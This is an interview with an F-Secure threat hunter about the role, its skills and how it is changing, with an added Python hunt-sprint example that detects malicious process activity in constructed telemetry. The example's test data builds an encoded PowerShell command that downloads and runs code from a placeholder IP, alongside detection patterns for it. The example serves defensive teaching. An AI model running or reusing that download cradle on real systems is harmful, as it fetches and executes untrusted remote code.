Cyber-threat actors keep refining the methods they use to evade security tooling, so simply waiting for an attack to occur and then trying to fend it off is no longer enough. Traditional defensive strategies built on known threats need to be combined with the ability to proactively identify new and emerging attack paths before they are exploited.
This need has led to the rise of a relatively new type of cybersecurity role – the threat hunter. These individuals are tasked with discovering potential dangers to an organization and bolstering security before any damage is caused. In essence, they need to think like an attacker and have deep insight into emerging cyber-attack trends.
So, what does it take to succeed in the world of threat-hunting, and what is life like on the front-line of the war against adversaries? Infosecurity recently spoke to Connor Morley, senior threat hunter at F-Secure, to find out.
What is a threat hunter, and what are their key duties?
A threat hunter works to defend estates and networks by understanding how they might be attacked. By thinking and behaving like an attacker, hunters actively engage in defense by understanding potential offensive attack paths. Once potential avenues of attack are discovered, defenders can mitigate them.
There is no better method of detection than a threat hunting team. When you hear about cyber-criminals lingering in a network for months and years, that’s probably because they didn’t have a team of hunters. A good threat-hunting team can detect breaches in hours or even minutes.
What inspired you to become a threat hunter, and how did you end up working in this role?
I’ve been a threat hunter for four years. I'm an avid security research investigator and almost fanatical about reading up and staying on top of the latest threats. I love to pick apart advanced techniques and see how they work so that we can tailor our detection and response.
I was a teenager when I began exploring computers, working my way around the CMD command or writing batch files, VBScripts and similar things. It was very low-tech but foundational because it showed me how computers worked.
I studied Computer Security and Forensics at university, focusing on offensive techniques and forensics analysis as well as penetration testing, enterprise server management and more. I graduated with a First-Class Honours degree and was given the opportunity to complete a doctorate at the university. However, after I started looking for a job, I was contacted about a possible position at F-Secure's Countercept department to do research-led active defense. Now I'm a senior threat hunter.
What are the key skills and attributes required to work in this area?
Many threat hunters start their career by earning an Offensive Security Certified Professional (OSCP) qualification, which gives them a basic understanding of offensive security. But the job requires us to take a giant step beyond anything that can be taught in the classroom. We must develop an attacker mindset that involves understanding the questions hackers ask and the answers they are likely to discover. It involves looking at an application and working out if it can be misused or made to do something it is not supposed to do.
The title of threat hunter barely existed just five years ago, meaning it can evoke images of comic book heroes joining forces to battle shady digital supervillains – but that's not the case. Threat actors are creative and persistent, which means threat hunters are forced to live by a philosophy that states that attacks are inevitable and all preventative measures will eventually fail, so threat hunting works more on the detective side.
This can be done by creating standard rules and toolsets that detect malicious behavior or by looking for threat actions in what are often called hunt sprints or use cases. Threat hunters devise hunt sprints that expose both indicators of compromise (IOCs) and indicators of attack (IOAs) based on new or emerging techniques and exploits, as well as data gathered from active incidents or reports from out in the wild. Hunters then sweep across their clients' estates to discover compromises based on the pre-conditions set out in the sprint. Findings are collated to create detection capabilities that pick up attackers who try to use the same technique, creating both legacy and future protection for clients.
Another myth around threat hunters imagines they are constantly chasing intruders out of the network and engaging in digital hand-to-hand battles. This is not the case. Hunters use response capabilities to slow down or halt an attacker and limit their activity until a fully-fledged remediation operation can be launched. Hunters track attackers and use the intel gathered in these observations to devise obstacles such as network speed bottlenecks that give incident response teams time to expel the attacker from the system and ensure they will never get back in.
There are occasions when hunters deal with a “hands-on keyboard” attacker, which is a very dangerous situation. When an attacker spots a threat hunting team, they may suddenly change tactics to throw hunters off the scent. They may also go nuclear and cause as much mayhem as possible, which is especially likely if their goal is to do maximum damage to the organization.
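The hunt-sprint workflow described in the answer above (pre-conditions built from an IOC and an IOA, a sweep across endpoint telemetry, findings collated into a reusable detection) as an added Python example. This is not code from the interview, F-Secure or Countercept: the process-creation events, host names and the IOC hash are constructed for illustration, the "Office application spawns a script host with an encoded command" IOA is a generic technique chosen for the example, and the Sigma-style shape of the generated rule is an assumption about the output format.

```python
"""Hunt sprint over constructed endpoint process-creation telemetry.

Added example, not F-Secure/Countercept tooling. Every event, host name and
hash below is constructed; the IP is from the documentation range (TEST-NET-2).
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Set

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# PowerShell accepts abbreviated forms of -EncodedCommand; capture the payload.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Sprint pre-condition 1 (IOC): a binary hash taken from a hypothetical incident
# write-up. Constructed value, not a real sample.
IOC_HASHES: Set[str] = {"d" * 64}


def _encoded_ps(cmd: str) -> str:
    """Build a -enc payload the way an attacker would (UTF-16LE, then base64)."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed telemetry: one process-creation event per dict.
EVENTS = [
    {"host": "ws-01", "parent": "explorer.exe", "image": "winword.exe",
     "cmdline": "winword.exe /n invoice.docx", "sha256": "a" * 64},
    {"host": "ws-01", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _encoded_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"),
     "sha256": "b" * 64},
    {"host": "ws-02", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "sha256": "c" * 64},
    {"host": "ws-03", "parent": "cmd.exe", "image": "updater.exe",
     "cmdline": "updater.exe", "sha256": "d" * 64},          # matches the IOC
    {"host": "ws-04", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File build.ps1", "sha256": "b" * 64},  # benign admin use
]


@dataclass
class Finding:
    host: str
    kind: str      # "IOC" or "IOA"
    image: str
    parent: str
    detail: str


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -enc payload, or None if there is none or it is malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def run_hunt_sprint(events, ioc_hashes: Set[str] = IOC_HASHES) -> List[Finding]:
    """Sweep the telemetry for the sprint's pre-conditions and return the hits."""
    findings: List[Finding] = []
    for ev in events:
        image, parent = ev["image"].lower(), ev["parent"].lower()
        # Pre-condition 1 (IOC): known-bad hash. Cheap, exact, but only catches reuse.
        if ev["sha256"].lower() in ioc_hashes:
            findings.append(Finding(ev["host"], "IOC", image, parent,
                                    f"sha256 {ev['sha256']} is on the IOC list"))
        # Pre-condition 2 (IOA): behaviour, not artefact. An Office app spawning a
        # script host with an encoded command survives a recompiled payload.
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded is not None:
                findings.append(Finding(ev["host"], "IOA", image, parent,
                                        f"encoded command decodes to: {decoded}"))
    return findings


def collate_detection(findings: List[Finding]) -> dict:
    """Turn the sprint's IOA findings into a Sigma-style rule (assumed format) so
    the same technique is detected automatically after the sprint ends."""
    ioa = [f for f in findings if f.kind == "IOA"]
    return {
        "title": "Office application spawning script host with encoded command",
        "logsource": {"category": "process_creation", "product": "windows"},
        "detection": {
            "selection": {
                "ParentImage|endswith": sorted({f.parent for f in ioa}),
                "Image|endswith": sorted({f.image for f in ioa}),
                "CommandLine|re": ENCODED_FLAG.pattern,
            },
            "condition": "selection",
        },
        "level": "high",
    }


if __name__ == "__main__":
    hits = run_hunt_sprint(EVENTS)
    for h in hits:
        print(f"[{h.kind}] {h.host}: {h.parent} -> {h.image}; {h.detail}")
    print(collate_detection(hits))
```

The sweep flags ws-01 on the IOA (and prints the decoded download cradle, which is the intel worth keeping) and ws-03 on the IOC, while the administrator running a script file on ws-04 is left alone because neither pre-condition holds. The IOC catches only a re-used binary; the IOA rule generated from the findings is what carries the sprint forward against an attacker who rebuilds the payload.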
How has the role of threat hunter evolved over the years, and how do you expect it to develop in the future?
The entire security industry is moving towards models like zero trust, which are tighter security frameworks. One of the primary reasons for this is the growth of internal threats, which are now one of the main factors of compromise. Employees are often used as the point of attack – or launch the attack themselves, which is particularly dangerous because they have access to the network and in-depth knowledge of an organization’s systems. This makes it harder to detect their activities.
Zero trust deems all actions untrustworthy, so there can be no activity on an estate that isn’t associated with or categorized to a particular person, making it easier to detect unauthorized activities. We’ve also seen the cybersecurity sector move away from blacklists, which get longer and more sprawling because attackers are always able to work out new ways to dodge defenses.
Threat hunters must constantly adapt to find ways of detecting methodologies that can bypass blacklists, zero trust or whitelists. The best teams will find ways to leverage these evolutions against attackers and in favor of defenders.
What advice do you have for someone interested in becoming a threat hunter?
Make sure you love research because that’s how threat hunters refine their understanding of attackers and devise new offensive – and therefore defensive – capabilities. It is also important to pay attention to detail and be willing to constantly learn. You have to combine many different skills to be a threat hunter, so you must keep developing your knowledge, testing previous assumptions and devising new ways to tackle emerging threats.